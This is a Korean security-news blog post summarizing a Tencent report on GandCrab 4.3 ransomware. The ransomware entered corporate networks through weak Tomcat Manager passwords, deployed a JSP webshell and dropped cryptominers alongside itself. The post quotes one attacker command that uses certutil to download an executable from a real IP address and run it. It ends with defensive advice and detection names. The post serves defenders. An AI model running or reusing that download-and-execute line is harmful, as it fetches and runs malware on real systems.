포스팅 내용

국내외 보안동향

Tomcat서버, 갠드크랩(GandCrab) 4.3 랜섬웨어에 공격당해

최근 중국의 보안업체인 Tencent는 전문적으로 기업의 내부망을 타겟으로 하는 갠드크랩(GandCrab) 랜섬웨어를 발견했다고 밝혔습니다. 


이번에 발견된 갠드크랩의 버전은 4.3인것으로 확인되었습니다. 


이번에 발견된 버전이 이전 버전들과 다른 점은, 공격자가 내부망에 침입하여 채굴 악성코드와 랜섬웨어를 동시에 드랍하여, 공격 가치가 높은 시스템일 경우에는 GandCrab 랜섬웨어를, 공격가치가 상대적으로 낮은 시스템일 경우 채굴 악성코드를 사용하여 공격의 효율성을 높이려고 하였다는 점입니다.


이번 GandCrab 4.3은 Tomcat 서버의 취약한 비밀번호를 이용하여 침투를 하였습니다. 침투에 성공한 후, C2서버에서 랜섬웨어와 채굴 악성코드를 내려받습니다. 암호화된 파일을, 복호화 하려면 499달러의 복호화툴을 구매해야 합니다. 지갑 주소를 분석해본 결과, 공격자는 이미 18.6개 모네로 수익을 얻었으며, 이는 1.5만원(RMB) 가치와 맞먹습니다. 


기존의 갠드크랩은 일반적으로 스피어피싱이나 워터링홀 공격을 통해 유포되었습니다. 하지만 최근에는 기업의 Web서버를 공격 타겟으로 삼고있으며, 특히 Tomcat의 취약한 비밀번호 취약점을 타겟으로 하는 공격이 눈에띄게 증가하고 있습니다. 


일단 공격에 성공하면, 공격자는 이를 기반으로 비교적 손쉽게 내부망에서 악성코드를 확산시킬 수 있습니다. 주로 NSA 공격툴을 사용하거나 1433, 3389포트의 취약한 비밀번호 취약점을 이용하여 내부망에 확산 시킵니다. 그 후 공격자는 가치가 높다고 판단되는 자산들에 랜섬웨어를 실행시켜 파일들을 암호화 하며, 일반적인 시스템에서는 채굴 악성코드를 통하여 수익을 얻습니다. 



공격 분석


Tomcat 서버는 무료 오픈소스의 Web 어플리케이션 서버로, 높은 기술력, 안정성 및 무료인점 때문에 많은 Java 개발자들의 환경을 받고 있습니다. 


공격자는 Tomcat Manager의 취약한 기본 비밀번호를 통해 접근하였으며, 접근에 성공한 이후 공격자는 war 패키지(jexws3.war)를 업로드 하였습니다. 이 war 패키지 중에는 jsp webshell(jexws3.jsp)가 포함되어 있습니다. 공격자는 jsp webshell을 다음과 같은 명령으로 실행합니다. 


cmd.exe /c certutil.exe -urlcache -split -f http://85.192.92.5/info.exe %TEMP%/st.exe&cmd.exe /c %TEMP%:/st.exe


<이미지 출처 : http://www.freebuf.com/articles/es/184424.html>


다음과 같은 공격을 예방하려면 사용자여러분들께서는 Tomcat Manager의 기본 비밀번호를 변경하시고, 외부에 Manager를 노출하지 않도록 해야합니다. 


이 밖에도 화이트리스트 기반으로 로그인을 설정하고 불필요한 포트는 닫아 놓는 것이 좋습니다.


현재 알약에서는 해당 갠드크랩 랜섬웨어에 대하여 Trojan.Ransom.GandCrab, Misc.Riskware.BitCoinMiner로 탐지중에 있습니다. 





출처 :

http://www.freebuf.com/articles/es/184424.html




티스토리 방명록 작성
name password homepage